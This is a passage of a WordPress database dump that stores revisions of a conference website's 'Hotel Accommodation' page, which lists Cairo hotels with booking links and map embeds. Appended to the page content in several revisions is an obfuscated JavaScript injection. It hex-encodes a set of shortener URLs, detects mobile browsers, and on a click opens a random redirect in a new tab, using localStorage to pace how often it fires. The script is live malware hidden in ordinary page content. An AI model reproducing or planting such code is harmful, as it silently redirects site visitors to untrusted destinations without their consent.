_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-07-18 23:21:40','2023-07-18 23:21:40','',2685,'https://gsw2023.com/?p=5032',0,'revision','',0),
(5033,1,'2023-07-18 23:29:52','2023-07-18 23:29:52','','ramsis','','inherit','open','closed','','ramsis','','','2023-07-18 23:29:52','2023-07-18 23:29:52','',2685,'https://gsw2023.com/wp-content/uploads/2023/07/ramsis.webp',0,'attachment','image/webp',0),
(5034,1,'2023-07-18 23:36:41','2023-07-18 23:36:41','<p>[vc_row][vc_column][dt_banner image_id=\"2683\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">INTERCONTINENTAL CAIRO SEMIRAMIS</span></h2>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe></p>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><a style=\"color: #ffff00;\" href=\"https://www.ihg.com/intercontinental/hotels/us/en/cairo/croha/hoteldetail?fromRedirect=true&amp;qSrt=sAV&amp;qIta=99801505&amp;icdv=99801505&amp;qSlH=CROHA&amp;qGrpCd=DY8&amp;setPMCookies=true&amp;qSHBrC=IC&amp;qDest=Corniche+El+Nil%252C+Cairo%252C+EG&amp;srb_u=1\" target=\"_blank\" rel=\"noopener\">BOOK NOW</a></span></h5>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][dt_banner image_id=\"5033\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #ffffff;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<ul>\n<li><strong><span style=\"color: #0000ff; font-size: 12pt;\"><a style=\"color: #0000ff;\" href=\"https://www.guestreservations.com/ramses-hilton/booking?msclkid=5045658d464f1148cfd9013a670fd9bc\">Ramses Hilton Hotel &amp; Casino - Guest Reservations</a></span></strong></li>\n</ul>\n<p>&nbsp;</p>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.5319929288576!2d31.22717948709823!3d30.050281810255406!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c381a29537%3A0xf1d5b3a64a0e4de1!2sRamses%20Hilton!5e0!3m2!1sen!2ssa!4v1689723107695!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong>Deadline for the Special Rates is August 10, 2023</strong></span></h5>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><strong>BOOK NOW</strong></span></p>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: left;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: left;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4788\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Grand Nile Tower Hotel</span></h2>\n<ul>\n<li><span style=\"color: #ffffff;\"><a style=\"color: #ffffff;\" href=\"https://www.grandniletower.com/\">https://www.grandniletower.com/</a></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3454.091887744032!2d31.22467591511475!3d30.03422158188607!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x14584090695d6421%3A0x201285387107863a!2sGrand%20Nile%20Tower!5e0!3m2!1sen!2ssa!4v1689721277379!5m2!1sen!2ssa\" width=\"200\" height=\"200\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p>\n<h5 style=\"text-align: center;\"><a href=\"https://gsw2023.com/index.php/grand-nile-tower-hotel/\"><span style=\"font-size: 14pt; color: #ffff00;\">BOOK NOW</span></a></h5>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4730\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Novotel Cairo El Borg</span></h2>\n<ul>\n<li><span style=\"color: #ffffff; font-size: 12pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></strong></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<ul>\n<li>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n</li>\n</ul>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/novotel-cairo-el-borg/\"><span style=\"color: #ffff00;\">BOOK NOW </span> </a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2689\" bg_color=\"rgba(255,255,255,0.01)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Kempinski Nile Hotel Garden City Cairo</span></h2>\n<ul>\n<li><strong><span style=\"font-size: 12pt; color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></span></strong></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-07-18 23:36:41','2023-07-18 23:36:41','',2685,'https://gsw2023.com/?p=5034',0,'revision','',0),
(5035,1,'2023-07-18 23:37:56','2023-07-18 23:37:56','<p>[vc_row][vc_column][dt_banner image_id=\"2683\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">INTERCONTINENTAL CAIRO SEMIRAMIS</span></h2>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe></p>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><a style=\"color: #ffff00;\" href=\"https://www.ihg.com/intercontinental/hotels/us/en/cairo/croha/hoteldetail?fromRedirect=true&amp;qSrt=sAV&amp;qIta=99801505&amp;icdv=99801505&amp;qSlH=CROHA&amp;qGrpCd=DY8&amp;setPMCookies=true&amp;qSHBrC=IC&amp;qDest=Corniche+El+Nil%252C+Cairo%252C+EG&amp;srb_u=1\" target=\"_blank\" rel=\"noopener\">BOOK NOW</a></span></h5>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other 